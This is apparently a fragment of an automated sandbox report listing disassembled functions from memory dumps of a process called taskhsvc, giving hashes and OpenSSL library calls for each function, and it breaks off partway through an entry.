                                                            • API ID: O_mallocR_put_error
                                                            • String ID: l
                                                            • API String ID: 2513334388-2517025534
                                                            • Opcode ID: d39438d9442fb2f6482878d150e0b05ec587104b2088593e69ae260ba84c62c3
                                                            • Instruction ID: 87edef2fa65b7bb7b2fc9b332727e0c7c9334a72d56081ba1cdb91d2eaa75075
                                                            • Opcode Fuzzy Hash: d39438d9442fb2f6482878d150e0b05ec587104b2088593e69ae260ba84c62c3
                                                            • Instruction Fuzzy Hash: 3D31257150A3118FE700CF1AD450A0BBBF4BF89358F66891EE99A5B750D771E901CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_mallocstrlen
                                                            • String ID: J
                                                            • API String ID: 3192733237-1141589763
                                                            • Opcode ID: 36c7091269e7bd211632e848efbbb04ea661621e1eeb234bde3d4dfe3de4dfc7
                                                            • Instruction ID: ea8c62ab8beee4c7309e7136efbd4420b229fc6eb188591b6d9538c9faa681c7
                                                            • Opcode Fuzzy Hash: 36c7091269e7bd211632e848efbbb04ea661621e1eeb234bde3d4dfe3de4dfc7
                                                            • Instruction Fuzzy Hash: B921AE361087518FDB20CF25C84078BFBF1AF95308F1B8A5DE9941BB51D771A40A8BD2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 806ca5225d656905d6c31995d9184fb057c113920cc83fb9ab55443a5f85d821
                                                            • Instruction ID: 837149705f22b1f95ee48f64bb9a8ac8738a2077c2e1f7506326a787068ff550
                                                            • Opcode Fuzzy Hash: 806ca5225d656905d6c31995d9184fb057c113920cc83fb9ab55443a5f85d821
                                                            • Instruction Fuzzy Hash: EC01F6706093428FEB00DF25C68065ABBF4AF45358F219A1DE9A88B740E774D505CF16
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 10380ce1630f44c0ec69e6fdbb994c0c2710b4215f38910eacefce21663762a9
                                                            • Instruction ID: 383b73cac1a3e9ebc671fe1c243009cbe7326cec3b24abccd39aff8595c86593
                                                            • Opcode Fuzzy Hash: 10380ce1630f44c0ec69e6fdbb994c0c2710b4215f38910eacefce21663762a9
                                                            • Instruction Fuzzy Hash: FA413E356257018FEB14DF19C185A1BB7F5BB9932CF21891CEA6467B44C734E900CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CRYPTO_cfb128_encrypt.LIBEAY32 ref: 6CE5EF3D
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CE5EF52
                                                            • CRYPTO_ofb128_encrypt.LIBEAY32 ref: 6CE5EFA5
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_cfb128_encryptO_ofb128_encrypt__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 905777043-0
                                                            • Opcode ID: f246c086dc0e64b57a47ce27523923b355433eb11e8885661d6994499da25daa
                                                            • Instruction ID: ee56161fc387b1323e8ab8036dbb8be46b18a292e44053a01a62d8f3ed59f30b
                                                            • Opcode Fuzzy Hash: f246c086dc0e64b57a47ce27523923b355433eb11e8885661d6994499da25daa
                                                            • Instruction Fuzzy Hash: 4D213D749187418FC740DF29C28160ABBF0BB99308F518D2DF998C7710E376EA588F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_d2i
                                                            • String ID:
                                                            • API String ID: 785741724-0
                                                            • Opcode ID: b2df53d436c1971fe7fdf370d9a6b41973a0e8dd33a98e84b84c4fc30a6a5a38
                                                            • Instruction ID: 83526cd8d317b27090e034d875aff470f1eff4bab228cae585ab3d4e1903ea55
                                                            • Opcode Fuzzy Hash: b2df53d436c1971fe7fdf370d9a6b41973a0e8dd33a98e84b84c4fc30a6a5a38
                                                            • Instruction Fuzzy Hash: B12114B56093019FC700DF29C49464BBBF0FF99798F91882CE9888B710E3B5D844DB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_malloc$O_free
                                                            • String ID:
                                                            • API String ID: 2640950527-0
                                                            • Opcode ID: 99b0309a83b2e255870344a026365ac30ba051ce26fab82ceb0aa43680a393eb
                                                            • Instruction ID: 773d99818cf9e77fa33967e4dd1336a046501030780df418d10418939efa59e5
                                                            • Opcode Fuzzy Hash: 99b0309a83b2e255870344a026365ac30ba051ce26fab82ceb0aa43680a393eb
                                                            • Instruction Fuzzy Hash: 6611D3B0219601CFEB00DF29C594706BBF4AB45348F26C868D9888F755D3BAD8498FA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • OBJ_obj2nid.LIBEAY32 ref: 6CF6B014
                                                              • Part of subcall function 6CE29750: lh_retrieve.LIBEAY32 ref: 6CE29799
                                                            • PKCS12_SAFEBAGS_it.LIBEAY32 ref: 6CF6B027
                                                            • PKCS12_item_decrypt_d2i.LIBEAY32 ref: 6CF6B050
                                                              • Part of subcall function 6CF6CAA0: EVP_CIPHER_CTX_init.LIBEAY32 ref: 6CF6CAFE
                                                              • Part of subcall function 6CF6CAA0: EVP_PBE_CipherInit.LIBEAY32 ref: 6CF6CB27
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: CipherInitJ_obj2nidS12_S12_item_decrypt_d2iS_itX_initlh_retrieve
                                                            • String ID:
                                                            • API String ID: 3703912448-0
                                                            • Opcode ID: aa72af66d2907b6b8f594c7d17085940ebcbb5109934a95df4904746aec25a2d
                                                            • Instruction ID: 008024a59f336b27fc96ddcf4e71a156cc0f739a1d92e900987e0f03868ba194
                                                            • Opcode Fuzzy Hash: aa72af66d2907b6b8f594c7d17085940ebcbb5109934a95df4904746aec25a2d
                                                            • Instruction Fuzzy Hash: A20113755083009FCB00DF2AD684A4BFBF4EB88358F068D59E9988B711D331E809CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_lock$O_free
                                                            • String ID:
                                                            • API String ID: 1526627863-0
                                                            • Opcode ID: 9447cbd91d16b8b838fd1760137aac655fde4c8c14b3c385d604200ab1d8c105
                                                            • Instruction ID: 63abdc4ecc4e499c4ff2d018c9f4ce1272bff6fe0866fd3264b0a69f128f020c
                                                            • Opcode Fuzzy Hash: 9447cbd91d16b8b838fd1760137aac655fde4c8c14b3c385d604200ab1d8c105
                                                            • Instruction Fuzzy Hash: 1911F2B0A293419EEB089F21D44178ABBF0FB42308F20880EE4988BB51C3BDC445CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_lock$O_free
                                                            • String ID:
                                                            • API String ID: 1526627863-0
                                                            • Opcode ID: 14eaf82bc2a7e005ba14cd25c5f5ee67c7c76c8adf863941ab84d22fa089b2a6
                                                            • Instruction ID: 1e8876c0075cd9adc083b3dd9b8b6e6011a0c4dcbc36678bec7ebe2ec444b728
                                                            • Opcode Fuzzy Hash: 14eaf82bc2a7e005ba14cd25c5f5ee67c7c76c8adf863941ab84d22fa089b2a6
                                                            • Instruction Fuzzy Hash: 2C11C2B09293409EEB049F21D44538ABBF0FF46308F60880EE5D847B51C7BD9449CF52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • OpenSSLDie.LIBEAY32 ref: 6CE4CF0F
                                                              • Part of subcall function 6CE22620: OPENSSL_showfatal.LIBEAY32 ref: 6CE2280D
                                                            • AES_decrypt.LIBEAY32 ref: 6CE4CFBB
                                                            • OpenSSLDie.LIBEAY32 ref: 6CE4D077
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Open$L_showfatalS_decrypt
                                                            • String ID: X
                                                            • API String ID: 3858874810-3081909835
                                                            • Opcode ID: 3954b02b03c4bdd9e5da3eeb09c9d8432c2e813a21e9d930e29b9d8095d648bd
                                                            • Instruction ID: c78c24b1e0b5e9dcd6f1b617ee708690c8dccd3822f4eaa2d25bbb917477246f
                                                            • Opcode Fuzzy Hash: 3954b02b03c4bdd9e5da3eeb09c9d8432c2e813a21e9d930e29b9d8095d648bd
                                                            • Instruction Fuzzy Hash: F251A079A097418FD714CF19D180A0AFBF1BF88214F25CA5EE9989B711D730E951CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_mallocstrlen
                                                            • String ID: h
                                                            • API String ID: 3192733237-2439710439
                                                            • Opcode ID: 7310366926cadf4ceef807de108e3d4322defc61cd9ce3ed3e692a15771455e2
                                                            • Instruction ID: 2913633a8424950798d00c52304edc2c5079e261b8e439ca8722e776859025c7
                                                            • Opcode Fuzzy Hash: 7310366926cadf4ceef807de108e3d4322defc61cd9ce3ed3e692a15771455e2
                                                            • Instruction Fuzzy Hash: 860124745486018BD711CF28C14135ABBF1BF4A708F208A5CD8999B700E338D946CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_free$O_mallocR_put_errorstrlen
                                                            • String ID: h
                                                            • API String ID: 504393152-2439710439
                                                            • Opcode ID: 8c8591f0d9e4c5ec74bb7b8dfa9b090ae87e8c350aa9dbf9b65f6e49efb275bf
                                                            • Instruction ID: e20b83f55849e1dc46cbfaef00b64edf06df30ef452bdb60fea1f17beb697b88
                                                            • Opcode Fuzzy Hash: 8c8591f0d9e4c5ec74bb7b8dfa9b090ae87e8c350aa9dbf9b65f6e49efb275bf
                                                            • Instruction Fuzzy Hash: 43F030715486148FD700CF29C58034AB7F1BF45718F65CA58D8999B704D738E905CFC2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: T_encrypt
                                                            • String ID:
                                                            • API String ID: 2450657872-0
                                                            • Opcode ID: b0099d8cb121efd5d654878b54f32b878112570f27a74e74b29b553ec4dc4ea2
                                                            • Instruction ID: 1d17764754f04504e4a62a6a0e97fd7ddbb2044a58a7372c5b6f450b0186b33e
                                                            • Opcode Fuzzy Hash: b0099d8cb121efd5d654878b54f32b878112570f27a74e74b29b553ec4dc4ea2
                                                            • Instruction Fuzzy Hash: 71E17073F201614FDB88CE69D5D062A77B3EBCA390B4B8568DA0657386CB70F815CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • BIO_s_file.LIBEAY32 ref: 6CF0AE8E
                                                            • BIO_new.LIBEAY32 ref: 6CF0AE96
                                                              • Part of subcall function 6CEC4560: CRYPTO_malloc.LIBEAY32 ref: 6CEC458C
                                                            • ERR_put_error.LIBEAY32 ref: 6CF0B2C7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_mallocO_newO_s_fileR_put_error
                                                            • String ID: $!$P$t$y
                                                            • API String ID: 3557565517-1891209401
                                                            • Opcode ID: c3255efe5d4f2e67b8146a9d14517d727f16df608faa4c2313c2ddea8e916ee5
                                                            • Instruction ID: 7481d02a2b857957ea84710da1a3cd46791d0ed3a9e58da270f31ad75192051c
                                                            • Opcode Fuzzy Hash: c3255efe5d4f2e67b8146a9d14517d727f16df608faa4c2313c2ddea8e916ee5
                                                            • Instruction Fuzzy Hash: 18E1C1B13097069FD740AF25C19476FBBF0AF84748F21991DE9988BB21E734D8859B83
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X_get$N1_item_freeP_get_orderR_put_errorX_endX_freeX_newX_startY_get0_groupY_get0_public_key__stack_chk_fail
                                                            • String ID: A$f
                                                            • API String ID: 2684192164-3676314414
                                                            • Opcode ID: 2bff6bdd3d412ded6e4953a1aed0b2ee7d921192b1e5eed762742f2b0e38c6c9
                                                            • Instruction ID: 679a87055ac34358657cd4f6924ed3db6298d1c1d19829a9250279bc78af310a
                                                            • Opcode Fuzzy Hash: 2bff6bdd3d412ded6e4953a1aed0b2ee7d921192b1e5eed762742f2b0e38c6c9
                                                            • Instruction Fuzzy Hash: 46F1D0B06197419FD300DF6AC68065ABBF0BF88758F218A2DF4D897B50E774D9458F82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $!$P$t$y
                                                            • API String ID: 0-1891209401
                                                            • Opcode ID: 17b8bff824fb42a47f94cec89ecef4d87980cf4bc2c1b8d0166e25469b0b5a8f
                                                            • Instruction ID: e047df70e0ae5a6ec6065d495dd77a7904858b9a6bc92b0c3fcbdfa641c006a5
                                                            • Opcode Fuzzy Hash: 17b8bff824fb42a47f94cec89ecef4d87980cf4bc2c1b8d0166e25469b0b5a8f
                                                            • Instruction Fuzzy Hash: 06C1C1B13097069FD700AF25C69176FBBF0AF84788F11891DE9988BB11E735D885DB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N_free$N_bin2bn$P_freeP_newR_put_errorX_new
                                                            • String ID: A
                                                            • API String ID: 1420501482-3554254475
                                                            • Opcode ID: 30867ac295464eb8fb697251ca8eea817f597eb2f20fba035083a2811976f874
                                                            • Instruction ID: e8fbc3c9a3126a4452439dc61eecd1e48d341e056d7b3847c5f5fcc6097fd2c2
                                                            • Opcode Fuzzy Hash: 30867ac295464eb8fb697251ca8eea817f597eb2f20fba035083a2811976f874
                                                            • Instruction Fuzzy Hash: 33E1E5B061A7019FE700EF69C48475ABBF0BF85748F219E2DE4D997B50E7B8D4448B82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X_get$B_call$N_add_wordN_copyN_is_prime_fasttest_ex$N_cmpN_mulN_value_oneX_endX_start
                                                            • String ID: 2
                                                            • API String ID: 1485418919-450215437
                                                            • Opcode ID: a6753c465388280ec7f506bd018c4b633a30bee84dc0e1f31d0bd14d004d4b56
                                                            • Instruction ID: 45569e6c734ada8aaa6a67a8bb8a1ee1462cd8436f5f6e42bf7b7ed56b9cfd1d
                                                            • Opcode Fuzzy Hash: a6753c465388280ec7f506bd018c4b633a30bee84dc0e1f31d0bd14d004d4b56
                                                            • Instruction Fuzzy Hash: 5DC1ACB051A701AFD3409F2AC58825EFBF0BF98748F60891EE99897B50E778D845CF52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N_cmpN_num_bitsN_value_one
                                                            • String ID: arg2 lt arg3
                                                            • API String ID: 1848942457-4160843357
                                                            • Opcode ID: 02f750f5f984967f8a7e0cff2e77c797a8b11e9b71640067a8e13442be140d71
                                                            • Instruction ID: e0ee579550d6390c9f70867dc4fb9d73a57b719909adda5ee2453f48b7b3e2e7
                                                            • Opcode Fuzzy Hash: 02f750f5f984967f8a7e0cff2e77c797a8b11e9b71640067a8e13442be140d71
                                                            • Instruction Fuzzy Hash: F6C13A70619B019BD7209F29C58435EB7F1AF85358F358D2DE899CBB80E735C846CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error__stack_chk_fail
                                                            • String ID: A$d$q$z$z
                                                            • API String ID: 738277180-1118053764
                                                            • Opcode ID: 71d480d2e8dade05176cddce8a68638279d6018c430cb93f8adca837a3dcf73d
                                                            • Instruction ID: 4bd600fad9390dbc9f87251968ae54200ed7f93f3b3c66a092b4eadc38bc65ff
                                                            • Opcode Fuzzy Hash: 71d480d2e8dade05176cddce8a68638279d6018c430cb93f8adca837a3dcf73d
                                                            • Instruction Fuzzy Hash: D8C126B15087019FE320DF26C58435BBBF4AF85358F21891DE9988BB50D3B9E549CFA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • OPENSSL_load_builtin_modules.LIBEAY32(?,?,?,?,?,?,?,?,?,6CEE376F), ref: 6CF624CC
                                                              • Part of subcall function 6CF62470: ASN1_add_oid_module.LIBEAY32 ref: 6CF6247E
                                                            • ENGINE_load_builtin_engines.LIBEAY32(?,?,?,?,?,?,?,?,?,6CEE376F), ref: 6CF624D1
                                                              • Part of subcall function 6CEBFDD0: OPENSSL_cpuid_setup.LIBEAY32 ref: 6CEBFDDE
                                                              • Part of subcall function 6CEBFDD0: ENGINE_load_rdrand.LIBEAY32 ref: 6CEBFDE3
                                                              • Part of subcall function 6CEBFDD0: ENGINE_load_dynamic.LIBEAY32 ref: 6CEBFDE8
                                                            • ERR_clear_error.LIBEAY32(?,?,?,?,?,?,?,?,?,6CEE376F), ref: 6CF624D6
                                                              • Part of subcall function 6CEDAA60: ERR_get_state.LIBEAY32(?,?,?,?,?,?,?,?,00000000,6CE8ABD3), ref: 6CEDAA6F
                                                            • CONF_modules_load_file.LIBEAY32 ref: 6CF624EE
                                                              • Part of subcall function 6CF61B00: NCONF_new.LIBEAY32 ref: 6CF61B29
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_load_builtin_enginesE_load_dynamicE_load_rdrandF_modules_load_fileF_newL_cpuid_setupL_load_builtin_modulesN1_add_oid_moduleR_clear_errorR_get_state
                                                            • String ID: b
                                                            • API String ID: 366989932-1908338681
                                                            • Opcode ID: e79533eddc3d89e9d638258aa313cbe781c8c629f43d9d8eb46fba0a6904931c
                                                            • Instruction ID: d1082cb6296ae31dba6f81958a2ee06e78e130d35425b4d2f573292eaa8cd23b
                                                            • Opcode Fuzzy Hash: e79533eddc3d89e9d638258aa313cbe781c8c629f43d9d8eb46fba0a6904931c
                                                            • Instruction Fuzzy Hash: F8D168B16093059FD700DF2AC58475BBBF1AF89348F15892DE8989BB01E736E945CF82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X_get$X_end$X_start$N_copyN_divN_mulN_num_bitsN_rshiftN_set_bitN_set_wordN_ucmp
                                                            • String ID: e
                                                            • API String ID: 1360357366-4024072794
                                                            • Opcode ID: cb8d928f8e80e55de4a38c2c22c3b40131e5695941b88d3a831cb63b953c6b2d
                                                            • Instruction ID: 6f7c025f15830e2ae6a8676f5790671a9dbf9070e2169a30cb23799c843e0cf0
                                                            • Opcode Fuzzy Hash: cb8d928f8e80e55de4a38c2c22c3b40131e5695941b88d3a831cb63b953c6b2d
                                                            • Instruction Fuzzy Hash: 0991E5B06197019FD350EF2AC58065ABBF8BF88748F219D2DE89987B40E735D444CFA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • EVP_MD_CTX_init.LIBEAY32 ref: 6CF82F31
                                                              • Part of subcall function 6CF7B300: X509_ALGOR_get0.LIBEAY32 ref: 6CF7B6D9
                                                              • Part of subcall function 6CF7B300: OBJ_obj2nid.LIBEAY32 ref: 6CF7B6E5
                                                              • Part of subcall function 6CF7B300: BIO_find_type.LIBEAY32 ref: 6CF7B761
                                                              • Part of subcall function 6CF7B300: ERR_put_error.LIBEAY32 ref: 6CF7B793
                                                            • EVP_MD_CTX_cleanup.LIBEAY32 ref: 6CF82F55
                                                            • EVP_DigestFinal_ex.LIBEAY32 ref: 6CF82F93
                                                            • memcmp.MSVCRT ref: 6CF82FB9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: DigestFinal_exJ_obj2nidO_find_typeR_get0R_put_errorX509_X_cleanupX_initmemcmp
                                                            • String ID: O$k$u
                                                            • API String ID: 1983237708-2798927928
                                                            • Opcode ID: 3a933091b6bbb2962832b72e119fe1602d5b6b4ab9b4c725f574b4a6c19a360c
                                                            • Instruction ID: a7242642d5df10ec385b4b7b0500d57b26b68ab8fc7746e5231cea9257120d34
                                                            • Opcode Fuzzy Hash: 3a933091b6bbb2962832b72e119fe1602d5b6b4ab9b4c725f574b4a6c19a360c
                                                            • Instruction Fuzzy Hash: 459147B1A097019FD700DF25C98070BBBF0BF85748F16891DE9A88B760D779E949CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • PKCS7_add_signed_attribute.LIBEAY32 ref: 6CF6A613
                                                            • X509_gmtime_adj.LIBEAY32 ref: 6CF6A63F
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6A66F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_errorS7_add_signed_attributeX509_gmtime_adj
                                                            • String ID: 3$A
                                                            • API String ID: 3671222339-694096507
                                                            • Opcode ID: a6ffcbb879bc13f579e609f2e0b97a7a2a52f640731ef5c114a0df3b1f35aaa2
                                                            • Instruction ID: ca34e4884dfab326cc92b4ce8824fc1ac010ff7ee64533487e1ed52e384b2fc3
                                                            • Opcode Fuzzy Hash: a6ffcbb879bc13f579e609f2e0b97a7a2a52f640731ef5c114a0df3b1f35aaa2
                                                            • Instruction Fuzzy Hash: 8071F3B15083109FD700DF6AC58064FFBF4AB89358F01892EEA9887B10D375E949CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • PKCS7_new.LIBEAY32 ref: 6CF68F3E
                                                              • Part of subcall function 6CF63470: ASN1_item_new.LIBEAY32 ref: 6CF63485
                                                            • PKCS7_set_type.LIBEAY32 ref: 6CF68F58
                                                              • Part of subcall function 6CF64420: OBJ_nid2obj.LIBEAY32 ref: 6CF6443B
                                                            • PKCS7_free.LIBEAY32 ref: 6CF690C3
                                                            • ERR_put_error.LIBEAY32 ref: 6CF691A1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: J_nid2objN1_item_newR_put_errorS7_freeS7_newS7_set_type
                                                            • String ID: A$h$w$|
                                                            • API String ID: 2814899340-2631548946
                                                            • Opcode ID: 6f0e8836e4292d3286b1bf7ff14af60b3a408105bb2a8af9cb39ad15a6d3162d
                                                            • Instruction ID: 28141623705c8a2fa887e1d03f9facfaa54c2c7912f2fd51282037f84a70b1f0
                                                            • Opcode Fuzzy Hash: 6f0e8836e4292d3286b1bf7ff14af60b3a408105bb2a8af9cb39ad15a6d3162d
                                                            • Instruction Fuzzy Hash: 9B51D5B0509701AFE3009F26C54435BBBF0EF84748F12891DE9D887B50DBBAD588CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
